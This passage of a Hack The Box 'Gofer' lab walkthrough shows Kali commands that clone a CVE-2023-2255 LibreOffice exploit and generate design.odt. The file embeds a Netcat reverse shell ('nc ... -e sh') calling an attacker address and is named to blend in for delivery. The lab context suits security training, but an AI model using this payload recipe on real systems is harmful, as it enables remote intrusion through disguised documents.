CVE-2023-2255
┌──(kali㉿kali)-[~/archive/htb/labs/gofer]
└─$ git clone https://github.com/elweth-sec/CVE-2023-2255.git ; cd CVE-2023-2255
Cloning into 'CVE-2023-2255'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 10 (delta 2), reused 5 (delta 0), pack-reused 0
receiving objects: 100% (10/10), 8.47 KiB | 8.47 MiB/s, done.
resolving deltas: 100% (2/2), done.
I will first download the exploit to Kali
┌──(kali㉿kali)-[~/…/htb/labs/gofer/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --help
usage: CVE-2023-2255.py [-h] --cmd CMD [--output OUTPUT]
CVE-2023-2255
options:
-h, --help show this help message and exit
--cmd CMD Command to execute
--output OUTPUT Output filename
The usage appears to be simple
┌──(kali㉿kali)-[~/…/htb/labs/gofer/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'nc 10.10.14.20 9999 -e sh' --output design.odt
File design.odt has been created !
I named the payload design.odt
to blend in to the organization’s core service
The output file has an embedded Netcat reverse shell
Payload is ready for delivery